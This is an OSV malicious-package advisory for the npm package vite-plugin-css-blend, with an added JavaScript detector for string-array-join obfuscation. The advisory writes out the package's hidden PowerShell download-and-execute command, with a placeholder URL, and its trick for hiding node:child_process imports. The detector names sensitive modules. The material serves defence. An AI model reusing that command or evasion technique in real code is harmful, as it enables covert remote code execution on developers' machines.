MAL-2026-4706

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/vite-plugin-css-blend/MAL-2026-4706.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-4706
Published
2026-05-24T17:15:49Z
Modified
2026-05-26T06:03:02.856741506Z
Summary
Malicious code in vite-plugin-css-blend (npm)
Details


Source: amazon-inspector (7a47fa75fbd028d1aca89ca790036f760c76d8e486175505ef4a8f59f33e7c76)

The package is published as a Vite CSS plugin but exposes no Vite plugin API. Its documented applyGlobalStyles({palette, accents}) export, when called on Windows, treats the caller-supplied accents and palette strings as an AES-256-CBC IV and ciphertext, decrypts them with a hardcoded key, and spawns powershell.exe -WindowStyle Hidden -NoProfile -Command "irm <decrypted-url> -o $env:TEMP\s.js; node $env:TEMP\s.js" — fetching and executing an attacker-controlled JavaScript payload via Node. The node:crypto and node:child_process modules are imported via string-array join (["no","de",":","cry","pto"].join(""), ["no","de",":","chi","ld","_pro","cess"].join("")) to evade static import detection. The package further ships ~200 numbered no-op exports (e.g., isWithinBoundary1..200, applyPreset1..150, createSequenceStep1..250) as filler to camouflage the malicious export among legitimate-looking utilities, and its name baits developers searching the Vite ecosystem. Any consumer following the documented API on a Windows host triggers download-and-execute of arbitrary remote code.
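The string-array join technique described above defeats scanners that only look for literal `require('node:child_process')` or `import ... from 'node:crypto'`. The following is an added example, not code from the advisory or from the package, of a small static check that resolves such joins and flags the ones that rebuild a sensitive Node module name. The function names (`findObfuscatedModuleRefs`, `sensitiveOnly`, `resolveJoinedString`), the module list and the sample source lines are all constructed for this example.

```javascript
'use strict';
// Added example (not part of the OSV record): resolve `[...strings].join('')`
// constructions in JavaScript source and flag those that spell out a
// sensitive Node module. Module names and sample source are constructed.

// Module names a reviewer would not expect a CSS plugin to need.
const SENSITIVE_MODULES = new Set([
  'node:crypto', 'crypto',
  'node:child_process', 'child_process',
  'node:fs', 'fs',
  'node:http', 'node:https', 'http', 'https',
]);

// An array literal made only of string literals, immediately followed by
// .join('') or .join("").  Group 1 captures the comma-separated literals.
const JOIN_ARRAY_RE =
  /\[\s*((?:"[^"\\]*"|'[^'\\]*')(?:\s*,\s*(?:"[^"\\]*"|'[^'\\]*'))*)\s*\]\s*\.join\(\s*(?:""|'')\s*\)/g;

// Individual string literals inside the captured array body.
const STRING_LITERAL_RE = /"([^"\\]*)"|'([^'\\]*)'/g;

// Concatenate the literals exactly as .join('') would at runtime.
function resolveJoinedString(arrayBody) {
  let out = '';
  for (const m of arrayBody.matchAll(STRING_LITERAL_RE)) {
    out += m[1] !== undefined ? m[1] : m[2];
  }
  return out;
}

// Return every resolved join with its 1-based line number and whether the
// resolved string names a sensitive module.
function findObfuscatedModuleRefs(source) {
  const findings = [];
  for (const m of source.matchAll(JOIN_ARRAY_RE)) {
    const resolved = resolveJoinedString(m[1]);
    const line = source.slice(0, m.index).split('\n').length;
    findings.push({ line, resolved, sensitive: SENSITIVE_MODULES.has(resolved) });
  }
  return findings;
}

// Convenience filter for the findings a reviewer actually wants to read.
function sensitiveOnly(source) {
  return findObfuscatedModuleRefs(source).filter((f) => f.sensitive);
}

// Constructed sample: two obfuscated module names in the style described by
// the advisory, one benign join, and one plain require that must not match.
const SAMPLE_SOURCE = [
  "const a = require(['no','de',':','cry','pto'].join(''));",
  'const b = require(["no","de",":","chi","ld","_pro","cess"].join(""));',
  "const greeting = ['hel','lo'].join('');",
  "const c = require('path');",
].join('\n');

for (const f of findObfuscatedModuleRefs(SAMPLE_SOURCE)) {
  const mark = f.sensitive ? '  <-- sensitive module' : '';
  console.log(`line ${f.line}: join resolves to "${f.resolved}"${mark}`);
}
```

The pattern is deliberately narrow: it only handles arrays whose elements are all plain string literals joined with an empty separator, which is exactly the form quoted in the advisory. Variants (non-empty separators, `String.fromCharCode`, `atob`, computed indices) need separate rules or a real parser, so treat a clean result as "no hit for this one pattern" rather than "no obfuscation".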

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-004520",
            "import_time": "2026-05-26T05:52:45.958440733Z",
            "source": "amazon-inspector",
            "versions": [
                "1.0.0"
            ],
            "modified_time": "2026-05-24T17:15:49Z",
            "sha256": "7a47fa75fbd028d1aca89ca790036f760c76d8e486175505ef4a8f59f33e7c76"
        }
    ]
}
References
Credits

Affected packages

npm / vite-plugin-css-blend

Package

Name
vite-plugin-css-blend
Purl
pkg:npm/vite-plugin-css-blend

Affected ranges

Affected versions

1.*
1.0.0

Database specific

cwes
[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/vite-plugin-css-blend/MAL-2026-4706.json"
indicators
{
    "package_integrity": [
        {
            "filename": "vite-plugin-css-blend-1.0.0.tgz",
            "hashes": {
                "sha1": "ba0320dec92a685a5a9ab6c00b33002cca7dba9f",
                "sha512_sri": "sha512-jS+E8kmq4UNZjCMf3vl7zW7oAuFs1Ii0gftpuMnCJJ5n2Qm2xLUUEnkY0SxWY7/CFWwYlYSDC3oOh9b/cwTQDw=="
            }
        }
    ],
    "evidence_files": [
        {
            "path": "dist/index.js",
            "sha256": "e8113412636bd5c602bc9cdd9f4f989947d8271899da7963a0411830b966f1ad",
            "tlsh": "e9c3ffcab1a23132d32b686048bf018bf377dda0177e4481d159a2adb63441ea5b7f7d"
        },
        {
            "path": "package.json",
            "sha256": "adb2dcdf06ad36894d9eb5eac3659a71a1a05c4fcb4636743b28c552d2437b95",
            "tlsh": "32012b308520482307d90573aca81643aaa58d6f5644bc08379e402c4bde6ab41fe77d"
        }
    ]
}